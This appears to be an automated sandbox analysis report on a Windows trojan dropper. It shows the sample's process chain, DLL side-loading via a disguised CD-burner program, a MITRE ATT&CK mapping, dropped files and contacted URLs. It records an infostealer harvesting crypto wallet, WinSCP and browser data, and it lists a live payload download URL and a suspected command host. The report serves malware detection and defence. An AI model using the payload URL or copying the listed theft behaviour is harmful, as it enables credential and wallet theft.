Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe "C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=676 -burn.filehandle.self=520	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_00101719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

0_2_00101719

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_00103A5F AllocateAndInitializeSid,CheckTokenMembership,

0_2_00103A5F

Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1372880261.000000006CCCE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000004.00000002.1434547488.000000006BAEE000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000EEC07 cpuid

0_2_000EEC07

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: _GetLocaleInfo_@16,SetLastError,newMultiByteFromWideCharSize,GetLocaleInfoA,MultiByteToWideChar,GlobalFree,	2_2_5BB32D1A
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	3_2_6C4A750C
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	3_2_6C4A767A
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	3_2_6C4A7270
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	3_2_6C4A52E4
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_6C51F2EF
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_6C51F356
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	3_2_6C4A73B4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,	4_2_6B33EF5C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_6B33F356
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	4_2_6B2C73B4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,	4_2_6B33F22F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	4_2_6B2C7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	4_2_6B2C52E4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_6B33F2EF
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_6B33F003
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,	4_2_6B33F05E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	4_2_6B2C767A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	4_2_6B2C750C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,	4_2_6B2C74D0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: _Getdateorder,___lc_handle_func,GetLocaleInfoW,	4_2_6B39B33D

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000D4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

0_2_000D4EDF

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000C6037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,

0_2_000C6037

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000C61DF GetUserNameW,GetLastError,

0_2_000C61DF

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_0010887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

0_2_0010887B

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000C5195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

0_2_000C5195

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dtbqpus9.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	4 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Create Account	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	2 Valid Accounts	2 Valid Accounts	1 Abuse Elevation Control Mechanism	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	4 Windows Service	21 Access Token Manipulation	4 Obfuscated Files or Information	NTDS	14 File and Directory Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	4 Windows Service	1 Software Packing	LSA Secrets	148 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	213 Process Injection	11 DLL Side-Loading	Cached Domain Credentials	221 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Masquerading	Proc Filesystem	11 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	213 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Indicator Removal	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
24EPV9vjc5.exe	47%	ReversingLabs	Win32.Trojan.Nekark

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\lrgstosohhljqy	26%	ReversingLabs	Win64.Trojan.Ulise
C:\Users\user\AppData\Local\Temp\qlar	26%	ReversingLabs	Win64.Trojan.Ulise
C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	3%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\Fondue.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtCore4.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtGui4.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtNetwork4.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtXml4.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	3%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\StarBurn.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcp100.dll	0%	ReversingLabs
C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcr100.dll	0%	ReversingLabs
C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	47%	ReversingLabs	Win32.Trojan.Nekark

Source	Detection	Scanner	Label
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW	0%	Avira URL Cloud	safe
https://bamarelakij.site/	0%	Avira URL Cloud	safe
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()	0%	Avira URL Cloud	safe
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa	0%	Avira URL Cloud	safe
https://avrupabaski.com/wp-content/upgrade/wsn.exe	0%	Avira URL Cloud	safe
https://bamarelakij.site:443/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFz	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.html	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D	0%	Avira URL Cloud	safe
https://ntp.msn.	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.htmlm	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHE	0%	Avira URL Cloud	safe
http://bugreports.qt-project.org/	0%	Avira URL Cloud	safe
https://bamarelakij.site:443	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.122	true	false	high
googlehosted.l.googleusercontent.com	142.250.185.97	true	false	high
bamarelakij.site	172.67.174.91	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true	false		high
https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978091&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430974305&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430979077&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D	false	Avira URL Cloud: safe	unknown
https://sb.scorecardresearch.com/b?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978081&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://sb.scorecardresearch.com/b2?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.mic	24EPV9vjc5.exe, 00000000.00000002.1644612834.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 24EPV9vjc5.exe, 00000000.00000003.1643931905.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.vmware.com/0	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msn.com	LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.it/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://xml.org/sax/features/namespace-prefixes	RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site:443/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFz	LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000067A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.biz/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://downloads.reneelab.com/download_api.php	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://bug.reneelab.com	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://qt.digia.com/	RescueCDBurner.exe, 00000004.00000002.1434547488.000000006BAEE000.00000002.00000001.01000000.00000014.sdmp	false		high
